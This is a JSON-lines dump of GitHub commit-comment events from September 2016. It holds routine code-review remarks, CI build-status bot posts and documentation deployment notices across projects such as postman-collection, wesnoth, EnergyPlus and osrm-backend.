{"id":"4552291833","type":"CommitCommentEvent","actor":{"login":"schlosna"},"repo":{"name":"palantir/atlasdb"},"payload":{"comment":{"id":18992751,"position":13,"line":33,"path":"atlasdb-client/src/main/java/com/palantir/atlasdb/transaction/impl/AbstractTransactionManager.java","commit_id":"cfa4881bd6e7e7ce9df441d7c1960510dae0db14","created_at":"2016-09-12T22:25:54Z","updated_at":"2016-09-12T22:25:54Z","body":"What actually enforces this?"}},"created_at":"2016-09-12T22:25:54Z"}
{"id":"4552292163","type":"CommitCommentEvent","actor":{"login":"danpat"},"repo":{"name":"Project-OSRM/osrm-backend"},"payload":{"comment":{"id":18992752,"position":11,"line":91,"path":"src/contractor/contractor.cpp","commit_id":"f8d33ea841067e15ed9716dde772587b92ebf323","created_at":"2016-09-12T22:25:59Z","updated_at":"2016-09-12T22:25:59Z","body":"Wanna add a comment to this line explaining the condition in plain English ?"}},"created_at":"2016-09-12T22:25:59Z"}
{"id":"4552293442","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18992755,"position":null,"line":null,"path":null,"commit_id":"b29e85bf5ad558827d742631f5891c53b7f1b8e6","created_at":"2016-09-12T22:26:18Z","updated_at":"2016-09-12T22:26:18Z","body":"fast-forwarding develop-2.2 to borshop-integration-655-bjs-feature-aae-hash-vclock = 6f3d20cb"}},"created_at":"2016-09-12T22:26:18Z"}
{"id":"4552294399","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18992757,"position":4,"line":54,"path":"test/functional/response.test.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T22:26:32Z","updated_at":"2016-09-12T22:26:32Z","body":"👍🏼"}},"created_at":"2016-09-12T22:26:32Z"}
{"id":"4552295296","type":"CommitCommentEvent","actor":{"login":"danpat"},"repo":{"name":"Project-OSRM/osrm-backend"},"payload":{"comment":{"id":18992759,"position":null,"line":null,"path":null,"commit_id":"f8d33ea841067e15ed9716dde772587b92ebf323","created_at":"2016-09-12T22:26:43Z","updated_at":"2016-09-12T22:26:43Z","body":"code needs to be formatted with `clang-format`"}},"created_at":"2016-09-12T22:26:43Z"}
{"id":"4552296630","type":"CommitCommentEvent","actor":{"login":"alexknvl"},"repo":{"name":"MCShovel/Movecraft-3"},"payload":{"comment":{"id":18992760,"position":33,"line":37,"path":"src/main/java/net/countercraft/movecraft/math/Direction.java","commit_id":"463432326c22b365c407205429d680e130436893","created_at":"2016-09-12T22:27:01Z","updated_at":"2016-09-12T22:27:01Z","body":"Yeah, this is better."}},"created_at":"2016-09-12T22:27:01Z"}
{"id":"4552297784","type":"CommitCommentEvent","actor":{"login":"alexknvl"},"repo":{"name":"MCShovel/Movecraft-3"},"payload":{"comment":{"id":18992765,"position":17,"line":28,"path":"src/main/java/net/countercraft/movecraft/math/Direction.java","commit_id":"463432326c22b365c407205429d680e130436893","created_at":"2016-09-12T22:27:16Z","updated_at":"2016-09-12T22:27:16Z","body":"`final static` is imho better."}},"created_at":"2016-09-12T22:27:16Z"}
{"id":"4552299413","type":"CommitCommentEvent","actor":{"login":"janicduplessis"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18992768,"position":null,"line":null,"path":null,"commit_id":"2bd5b0b440f6c5d60b65407429bf2c10222619b0","created_at":"2016-09-12T22:27:38Z","updated_at":"2016-09-12T22:27:38Z","body":"@cwdick @davidaurelio Should this fix issues like http://stackoverflow.com/questions/39453603/chrome-debugging-not-working-as-expected (posted in fb group today)? There is also #6946 and #7189 that may be related."}},"created_at":"2016-09-12T22:27:38Z"}
{"id":"4552299510","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18992769,"position":5,"line":167,"path":"test/unit/response-mime.test.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T22:27:41Z","updated_at":"2016-09-12T22:27:41Z","body":"By currently do you mean in this branch or is it failing in develop? If it's in this branch, we shouldn't merge without fixing it. "}},"created_at":"2016-09-12T22:27:41Z"}
{"id":"4552303269","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18992783,"position":null,"line":null,"path":null,"commit_id":"6f42046d7d456227da7f77a6b13dbb8b26fd72d8","created_at":"2016-09-12T22:28:34Z","updated_at":"2016-09-12T22:28:34Z","body":"#4262-Cooling-Towers-are-not-being-sequentially-loaded,-all-towers-are-running (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2369 of 2369 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-12T22:28:34Z"}
{"id":"4552303740","type":"CommitCommentEvent","actor":{"login":"alexknvl"},"repo":{"name":"MCShovel/Movecraft-3"},"payload":{"comment":{"id":18992784,"position":142,"line":118,"path":"src/main/java/net/countercraft/movecraft/math/Direction.java","commit_id":"463432326c22b365c407205429d680e130436893","created_at":"2016-09-12T22:28:41Z","updated_at":"2016-09-12T22:28:41Z","body":"Deprecated method. :("}},"created_at":"2016-09-12T22:28:41Z"}
{"id":"4552304071","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18992787,"position":14,"line":155,"path":"lib/collection/url.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T22:28:45Z","updated_at":"2016-09-12T22:28:45Z","body":"By yes you mean it's passing or failing? And what has lodash v3 and v4 got to do with this?"}},"created_at":"2016-09-12T22:28:45Z"}
{"id":"4552313913","type":"CommitCommentEvent","actor":{"login":"Fastjur"},"repo":{"name":"Fastjur/SEM-Project"},"payload":{"comment":{"id":18992801,"position":null,"line":null,"path":null,"commit_id":"72ee6ae3aec24518ab5ad2447790b49049e0d6c1","created_at":"2016-09-12T22:30:56Z","updated_at":"2016-09-12T22:30:56Z","body":"This branch has a lot of similarity to the now merged `xml-parser` branch. It has, in fact, got a lot of code that is exactly similar. Did you copy paste to another branch @Wolgo ?"}},"created_at":"2016-09-12T22:30:56Z"}
{"id":"4552317510","type":"CommitCommentEvent","actor":{"login":"astec"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":18992810,"position":55,"line":189,"path":"tools/public_api_guard/router/index.d.ts","commit_id":"0614c8c99d6680c3db3fac012ed45ff5c49b5a59","created_at":"2016-09-12T22:31:44Z","updated_at":"2016-09-12T22:31:44Z","body":"Why no line breaks here?"}},"created_at":"2016-09-12T22:31:44Z"}
{"id":"4552329895","type":"CommitCommentEvent","actor":{"login":"BeauBouchard"},"repo":{"name":"BeauBouchard/katelibby"},"payload":{"comment":{"id":18992825,"position":5,"line":4,"path":"src/commands/giphy.js","commit_id":"4f1c769a8094c7135b0fcce9114ccbe3be8c5f7a","created_at":"2016-09-12T22:34:36Z","updated_at":"2016-09-12T22:34:36Z","body":"fml"}},"created_at":"2016-09-12T22:34:36Z"}
{"id":"4552334157","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18992836,"position":null,"line":null,"path":null,"commit_id":"6f42046d7d456227da7f77a6b13dbb8b26fd72d8","created_at":"2016-09-12T22:35:38Z","updated_at":"2016-09-12T22:35:38Z","body":"#4262-Cooling-Towers-are-not-being-sequentially-loaded,-all-towers-are-running (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-12T22:35:38Z"}
{"id":"4552335748","type":"CommitCommentEvent","actor":{"login":"muniv"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":18992841,"position":null,"line":null,"path":null,"commit_id":"856379241eae3d12ed3dd534866bf2e5abb0eaaa","created_at":"2016-09-12T22:36:00Z","updated_at":"2016-09-12T22:36:00Z","body":"달리님 어제 제가 바꾼 코드에 문제가 있나요?\r\n/\\A#{URI::regexp(['http', 'https'])}\\z/ 로 테스트했더니 'http://'에서는 에러, 'http://abc' 같은 형식은 통과가 되었습니다. 두 케이스모두 invalid message를 띄워주고 싶어서 문제가 없으면 그대로 가보고 싶습니다!"}},"created_at":"2016-09-12T22:36:00Z"}
{"id":"4552338355","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":18992846,"position":null,"line":null,"path":null,"commit_id":"a09e364ec12e9fb48dfa0b4dda217b77e9e04938","created_at":"2016-09-12T22:36:39Z","updated_at":"2016-09-12T22:36:39Z","body":"Hmm, something weird is going on for you then. I haven't got the message at all when killing myself with satchels, mines or IED. If a third party can confirm by testing with this commit reverted that would be helpful.\r\n\r\nSatchels should never trigger it because the damage source is not null. You can see if you add this event handler to yourself:\r\n```sqf\r\nplayer addEventHandler [\"HandleDamage\",{systemChat str(_this); diag_log str(_this);}];\r\n```\r\nExample:\r\n```\r\n\"[B 1-1-B:1 ({[test]}ebay),\"body\",366.667,B 1-1-B:1 ({[test]}ebay),\"PipeBomb\"]\"\r\n\"DAMAGE: player hit by SurvivorW2_DZ in hands with PipeBomb for 733.333 scaled to 366667, Conscious true\"\r\n\"[B 1-1-B:1 ({[test]}ebay),\"hands\",733.333,B 1-1-B:1 ({[test]}ebay),\"PipeBomb\"]\"\r\n\"DAMAGE: player hit by SurvivorW2_DZ in legs with PipeBomb for 733.333 scaled to 366667, Conscious true\"\r\n\"[B 1-1-B:1 ({[test]}ebay),\"legs\",733.333,B 1-1-B:1 ({[test]}ebay),\"PipeBomb\"]\"\r\n\"[B 1-1-B:1 ({[test]}ebay),\"\",1.85976,B 1-1-B:1 ({[test]}ebay),\"\"]\"\r\n\"[B 1-1-B:1 ({[test]}ebay),\"head_hit\",0.723704,B 1-1-B:1 ({[test]}ebay),\"\"]\"\r\n\"[B 1-1-B:1 ({[test]}ebay),\"body\",1.05041,B 1-1-B:1 ({[test]}ebay),\"\"]\"\r\n\"[B 1-1-B:1 ({[test]}ebay),\"hands\",3.53311,B 1-1-B:1 ({[test]}ebay),\"\"]\"\r\n\"[B 1-1-B:1 ({[test]}ebay),\"legs\",7.74779,B 1-1-B:1 ({[test]}ebay),\"\"]\"\r\n```\r\nThe third parameter is the `_source` which will be the player who placed the satchel."}},"created_at":"2016-09-12T22:36:39Z"}
{"id":"4552338534","type":"CommitCommentEvent","actor":{"login":"marimysh"},"repo":{"name":"Komaric/BirthdayReminder"},"payload":{"comment":{"id":18992847,"position":78,"line":78,"path":"app/src/main/java/ru/komaric/birthdayreminder/adapter/RecyclerViewAdapter.java","commit_id":"767732e9d41de6021cf5362c90ac7efecc539411","created_at":"2016-09-12T22:36:41Z","updated_at":"2016-09-12T22:36:41Z","body":"а почему + d?"}},"created_at":"2016-09-12T22:36:41Z"}
{"id":"4552338852","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18992850,"position":null,"line":null,"path":null,"commit_id":"7075055dfdf2aea13d14a120ad4dc613803e415a","created_at":"2016-09-12T22:36:46Z","updated_at":"2016-09-12T22:36:46Z","body":"The following doc(s) have been deployed to the [1863migrat](https://1863migrat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/migrate](https://1863migrat-static-docs.pantheonsite.io/docs/migrate)\n"}},"created_at":"2016-09-12T22:36:46Z"}
{"id":"4552338857","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18992851,"position":null,"line":null,"path":null,"commit_id":"72c3693a4988ae6d21aa0733cf4c5ba578f62e27","created_at":"2016-09-12T22:36:46Z","updated_at":"2016-09-12T22:36:46Z","body":"The following doc(s) have been deployed to the [1863migrat](https://1863migrat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/migrate-manual](https://1863migrat-static-docs.pantheonsite.io/docs/migrate-manual)\n- [docs/migrate-wordpress](https://1863migrat-static-docs.pantheonsite.io/docs/migrate-wordpress)\n"}},"created_at":"2016-09-12T22:36:46Z"}
{"id":"4552345471","type":"CommitCommentEvent","actor":{"login":"kunagpal"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18992865,"position":14,"line":155,"path":"lib/collection/url.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T22:38:21Z","updated_at":"2016-09-12T22:38:21Z","body":"Since develop uses Lodash v3, a bulk of the context binding tasks are handled by Lodash itself. Come Lodash v4, none of those in place context handlers work correctly, resulting in broken test. Tests are passing on this branch, of course, which is what most of the changes are centered on."}},"created_at":"2016-09-12T22:38:21Z"}
{"id":"4552346431","type":"CommitCommentEvent","actor":{"login":"kunagpal"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18992870,"position":43,"line":219,"path":"lib/collection/url.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T22:38:36Z","updated_at":"2016-09-12T22:38:36Z","body":"Line 222."}},"created_at":"2016-09-12T22:38:36Z"}
{"id":"4552348358","type":"CommitCommentEvent","actor":{"login":"lucasgallucci"},"repo":{"name":"fedegiardini/TP6"},"payload":{"comment":{"id":18992880,"position":null,"line":null,"path":null,"commit_id":"e2ca5f287eb67f54d4c485267d86e3fe6a6d100b","created_at":"2016-09-12T22:39:06Z","updated_at":"2016-09-12T22:39:06Z","body":"Bien Fede, cuidado con el posicionamiento forzado."}},"created_at":"2016-09-12T22:39:06Z"}
{"id":"4552348872","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18992885,"position":12,"line":224,"path":"src/image_modifications.cpp","commit_id":"284b9fad897e6d47ac2c05f2a128d70e9bd1bb63","created_at":"2016-09-12T22:39:14Z","updated_at":"2016-09-12T22:39:14Z","body":"I think a temporary surface will be necessary for what I was planning here."}},"created_at":"2016-09-12T22:39:14Z"}
{"id":"4552349823","type":"CommitCommentEvent","actor":{"login":"joachifm"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18992890,"position":null,"line":null,"path":null,"commit_id":"54900180343eee7b87b4186f1179a568460514da","created_at":"2016-09-12T22:39:26Z","updated_at":"2016-09-12T22:39:26Z","body":"Just a heads up, looks like this broke the weston build: https://hydra.nixos.org/build/40438821/log/raw"}},"created_at":"2016-09-12T22:39:26Z"}
{"id":"4552350815","type":"CommitCommentEvent","actor":{"login":"mclements37"},"repo":{"name":"awalke/Minesweeper"},"payload":{"comment":{"id":18992894,"position":null,"line":null,"path":null,"commit_id":"3a93edb1fa6170e7172ba7bef6a178c539f42f8b","created_at":"2016-09-12T22:39:40Z","updated_at":"2016-09-12T22:39:40Z","body":"New Features:\r\nAdded a timer so player can compete for a best time.\r\nAdded bomb sound effect when the user clicks a bomb. (Works in Chrome).\r\n\r\nAdjustments:\r\nAdded code to body tag on CSS to disable text selection on the boxes, so you can't cheat by highlighting all the boxes (or pressing ctrl a) to see their hidden value.\r\nChanged \"Refresh\" to \"Start Over\" to clarify it.\r\nMade the bomb icons slightly bigger.\r\nChanged the cursor to a \"pointer' when hovering over a button."}},"created_at":"2016-09-12T22:39:40Z"}
{"id":"4552351287","type":"CommitCommentEvent","actor":{"login":"shinjonathan"},"repo":{"name":"shinjonathan/jesque"},"payload":{"comment":{"id":18992895,"position":12,"line":266,"path":"src/main/java/net/greghaines/jesque/client/AbstractClient.java","commit_id":"fb141c9499a8b2226dd79c6cc6ba5ad0ce75fdc7","created_at":"2016-09-12T22:39:46Z","updated_at":"2016-09-12T22:39:46Z","body":"See https://github.com/resque/resque-scheduler/blob/master/lib/resque/scheduler/delaying_extensions.rb#L64 for reference"}},"created_at":"2016-09-12T22:39:46Z"}
{"id":"4552352542","type":"CommitCommentEvent","actor":{"login":"aubergine10"},"repo":{"name":"aubergine10/Style"},"payload":{"comment":{"id":18992902,"position":null,"line":null,"path":null,"commit_id":"c83e5dc382aa08999caad83d37d156f3c8dacc9f","created_at":"2016-09-12T22:40:06Z","updated_at":"2016-09-12T22:40:06Z","body":"Fixes #7 "}},"created_at":"2016-09-12T22:40:06Z"}
{"id":"4552352838","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18992905,"position":44,"line":440,"path":"src/image_modifications.cpp","commit_id":"284b9fad897e6d47ac2c05f2a128d70e9bd1bb63","created_at":"2016-09-12T22:40:11Z","updated_at":"2016-09-12T22:40:11Z","body":"It's probably better to make a copy of the surface. Not doing so might cause unexpected results if you use an image both with and without `~O()`."}},"created_at":"2016-09-12T22:40:11Z"}
{"id":"4552353103","type":"CommitCommentEvent","actor":{"login":"kunagpal"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18992906,"position":5,"line":167,"path":"test/unit/response-mime.test.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T22:40:15Z","updated_at":"2016-09-12T22:40:15Z","body":"This test is [skipped in develop](https://github.com/postmanlabs/postman-collection/blob/develop/test/unit/response-mime.test.js#L167), and will require a fair amount of rewriting to fix."}},"created_at":"2016-09-12T22:40:15Z"}
{"id":"4552355192","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18992912,"position":58,"line":531,"path":"src/image_modifications.cpp","commit_id":"284b9fad897e6d47ac2c05f2a128d70e9bd1bb63","created_at":"2016-09-12T22:40:42Z","updated_at":"2016-09-12T22:40:42Z","body":"It's probably better to use a temporary surface, as not doing so could have unexpected consequences."}},"created_at":"2016-09-12T22:40:42Z"}
{"id":"4552355329","type":"CommitCommentEvent","actor":{"login":"cdaughtr"},"repo":{"name":"cdaughtr/fabric-sdk-nodejs"},"payload":{"comment":{"id":18992915,"position":null,"line":null,"path":null,"commit_id":"0ac78400baf552247a418063e890943c1318c189","created_at":"2016-09-12T22:40:44Z","updated_at":"2016-09-12T22:40:44Z","body":"Rename file to match name of function."}},"created_at":"2016-09-12T22:40:44Z"}
{"id":"4552358101","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18992922,"position":14,"line":155,"path":"lib/collection/url.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T22:41:22Z","updated_at":"2016-09-12T22:41:22Z","body":"But there's no technical blocker from this branch to pass all the tests. Cannot merge without that. Can we?"}},"created_at":"2016-09-12T22:41:22Z"}
{"id":"4552359618","type":"CommitCommentEvent","actor":{"login":"esotericabsurdist"},"repo":{"name":"esotericabsurdist/LearningWebAppDev"},"payload":{"comment":{"id":18992926,"position":null,"line":null,"path":null,"commit_id":"c8f9874c39da00dcc8dc7ddbc0f1f66746256902","created_at":"2016-09-12T22:41:44Z","updated_at":"2016-09-12T22:41:44Z","body":"All code was formatted using dirtymarkup . com and checked using validator . w3 . org"}},"created_at":"2016-09-12T22:41:44Z"}
{"id":"4552359809","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18992927,"position":14,"line":155,"path":"lib/collection/url.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T22:41:47Z","updated_at":"2016-09-12T22:41:47Z","body":"If this had gone unnoticed it would have been sad. "}},"created_at":"2016-09-12T22:41:47Z"}
{"id":"4552360893","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18992929,"position":null,"line":null,"path":null,"commit_id":"284b9fad897e6d47ac2c05f2a128d70e9bd1bb63","created_at":"2016-09-12T22:42:04Z","updated_at":"2016-09-12T22:42:04Z","body":"Are you calling adjust_surface_alpha on any surfaces that were not already a copy? If you are, you're likely to get unexpected results."}},"created_at":"2016-09-12T22:42:04Z"}
{"id":"4552363693","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18992935,"position":43,"line":219,"path":"lib/collection/url.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T22:42:46Z","updated_at":"2016-09-12T22:42:46Z","body":"That's not context binding. Seems like you've got this a bit wrong. @czardoz can you illuminate @kunagpal? 😜"}},"created_at":"2016-09-12T22:42:46Z"}
{"id":"4552364489","type":"CommitCommentEvent","actor":{"login":"kunagpal"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18992939,"position":5,"line":179,"path":"lib/collection/property.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T22:42:58Z","updated_at":"2016-09-12T22:42:58Z","body":"Outside => explicit context `.bind(this)` call\r\nInside => using `self` as an alias for `this`"}},"created_at":"2016-09-12T22:42:58Z"}
{"id":"4552365310","type":"CommitCommentEvent","actor":{"login":"marimysh"},"repo":{"name":"Komaric/BirthdayReminder"},"payload":{"comment":{"id":18992942,"position":131,"line":131,"path":"app/src/main/java/ru/komaric/birthdayreminder/adapter/RecyclerViewAdapter.java","commit_id":"767732e9d41de6021cf5362c90ac7efecc539411","created_at":"2016-09-12T22:43:11Z","updated_at":"2016-09-12T22:43:11Z","body":"да, придирка, но все же комментарий избыточен"}},"created_at":"2016-09-12T22:43:11Z"}
{"id":"4552365624","type":"CommitCommentEvent","actor":{"login":"SpadesNeil"},"repo":{"name":"PolarisSS13/Polaris"},"payload":{"comment":{"id":18992943,"position":null,"line":null,"path":null,"commit_id":"3f7646c5483465c6aaedb6fd8fe45a0e6c86aa48","created_at":"2016-09-12T22:43:16Z","updated_at":"2016-09-12T22:43:16Z","body":"so many reverts..."}},"created_at":"2016-09-12T22:43:16Z"}
{"id":"4552366505","type":"CommitCommentEvent","actor":{"login":"Vultraz"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18992948,"position":null,"line":null,"path":null,"commit_id":"284b9fad897e6d47ac2c05f2a128d70e9bd1bb63","created_at":"2016-09-12T22:43:29Z","updated_at":"2016-09-12T22:43:29Z","body":"Eh... one case, perhaps, at the end of textbox.cpp."}},"created_at":"2016-09-12T22:43:29Z"}
{"id":"4552366617","type":"CommitCommentEvent","actor":{"login":"kunagpal"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18992949,"position":18,"line":190,"path":"lib/collection/property.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T22:43:31Z","updated_at":"2016-09-12T22:43:31Z","body":"Yes, this should be declared outside, and re-used within."}},"created_at":"2016-09-12T22:43:31Z"}
{"id":"4552367269","type":"CommitCommentEvent","actor":{"login":"agorrod"},"repo":{"name":"wiredtiger/wiredtiger"},"payload":{"comment":{"id":18992952,"position":143,"line":143,"path":"test/java/com/wiredtiger/test/ConcurrentCloseTest.java","commit_id":"1ae0ab811fad080c197da3c0a73eb218226eb3f2","created_at":"2016-09-12T22:43:40Z","updated_at":"2016-09-12T22:43:40Z","body":"Nice catch, and thanks for letting us know. I've opened https://jira.mongodb.org/browse/WT-2907 to track the fix."}},"created_at":"2016-09-12T22:43:40Z"}
{"id":"4552369982","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18992962,"position":18,"line":190,"path":"lib/collection/property.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T22:44:18Z","updated_at":"2016-09-12T22:44:18Z","body":"👍🏼"}},"created_at":"2016-09-12T22:44:18Z"}
{"id":"4552370057","type":"CommitCommentEvent","actor":{"login":"kunagpal"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18992964,"position":35,"line":181,"path":"lib/collection/response.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T22:44:19Z","updated_at":"2016-09-12T22:44:19Z","body":"Okay, let's decide on picking one of `.bind(this)` or `self = this` and use it throughout."}},"created_at":"2016-09-12T22:44:19Z"}
{"id":"4552370384","type":"CommitCommentEvent","actor":{"login":"frankr612"},"repo":{"name":"mapfau/inputstream.mpd"},"payload":{"comment":{"id":18992965,"position":null,"line":null,"path":null,"commit_id":"45b23b4bcc4a714182c1209e3039d52613753794","created_at":"2016-09-12T22:44:24Z","updated_at":"2016-09-12T22:44:24Z","body":"While the last commit fixed maxdome playback, this one breaks it again. ;)\r\nLog Says:\r\n\r\nERROR: AddOnLog: InputStream MPEG DASH: Decrypt Sample returns failure!\r\n"}},"created_at":"2016-09-12T22:44:24Z"}
{"id":"4552370742","type":"CommitCommentEvent","actor":{"login":"cdaughtr"},"repo":{"name":"cdaughtr/fabric-sdk-nodejs"},"payload":{"comment":{"id":18992967,"position":null,"line":null,"path":null,"commit_id":"ffbf6c5d0cb086f224835f8f402b7edc2f568fa1","created_at":"2016-09-12T22:44:29Z","updated_at":"2016-09-12T22:44:29Z","body":"change module.exports from hfc to FileKeyValStore."}},"created_at":"2016-09-12T22:44:29Z"}
{"id":"4552371977","type":"CommitCommentEvent","actor":{"login":"kunagpal"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18992973,"position":14,"line":155,"path":"lib/collection/url.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T22:44:47Z","updated_at":"2016-09-12T22:44:47Z","body":"Indeed."}},"created_at":"2016-09-12T22:44:47Z"}
{"id":"4552374869","type":"CommitCommentEvent","actor":{"login":"Dormanil"},"repo":{"name":"NogginBops/ProjectPorcupine"},"payload":{"comment":{"id":18992978,"position":4,"line":4,"path":"Assets/StreamingAssets/Images/Furniture/compressor_oxygen.skon","commit_id":"79f909a74c573448b552d88e7556892409d777cb","created_at":"2016-09-12T22:45:29Z","updated_at":"2016-09-12T22:45:29Z","body":"AAA!! There's a tab in here! °A°"}},"created_at":"2016-09-12T22:45:29Z"}
{"id":"4552378901","type":"CommitCommentEvent","actor":{"login":"shamasis"},"repo":{"name":"postmanlabs/postman-collection"},"payload":{"comment":{"id":18992990,"position":5,"line":179,"path":"lib/collection/property.js","commit_id":"3560353cf57ee8fe289c6c72512df68b0db2fddd","created_at":"2016-09-12T22:46:29Z","updated_at":"2016-09-12T22:46:29Z","body":"I think you've got this a bit wrong. @czardoz maybe you could do a hangout tomorrow and explain him. "}},"created_at":"2016-09-12T22:46:29Z"}
{"id":"4552380131","type":"CommitCommentEvent","actor":{"login":"vishrutshah"},"repo":{"name":"veronicagg/autorest"},"payload":{"comment":{"id":18992995,"position":47,"line":125,"path":"src/generator/AutoRest.Ruby/Templates/ServiceClientTemplate.cshtml","commit_id":"93f58bcdb50e20baef5345d2c33f62ed7d896270","created_at":"2016-09-12T22:46:47Z","updated_at":"2016-09-12T22:46:47Z","body":"I think you don't need this line as it's already defaults to them in `connection` class's `request` method"}},"created_at":"2016-09-12T22:46:47Z"}
{"id":"4552380849","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18993000,"position":null,"line":null,"path":null,"commit_id":"284b9fad897e6d47ac2c05f2a128d70e9bd1bb63","created_at":"2016-09-12T22:46:58Z","updated_at":"2016-09-12T22:46:58Z","body":"Hmm, I think that's probably safe, since that surface is probably a canvas rather than an image..."}},"created_at":"2016-09-12T22:46:58Z"}
{"id":"4552381591","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18993004,"position":null,"line":null,"path":null,"commit_id":"5eb0c39a3e10753d600bed5a8541490820fbbb59","created_at":"2016-09-12T22:47:09Z","updated_at":"2016-09-12T22:47:09Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5eb0c39a3e10753d600bed5a8541490820fbbb59-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5eb0c39a3e10753d600bed5a8541490820fbbb59-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-12T22:47:09Z"}
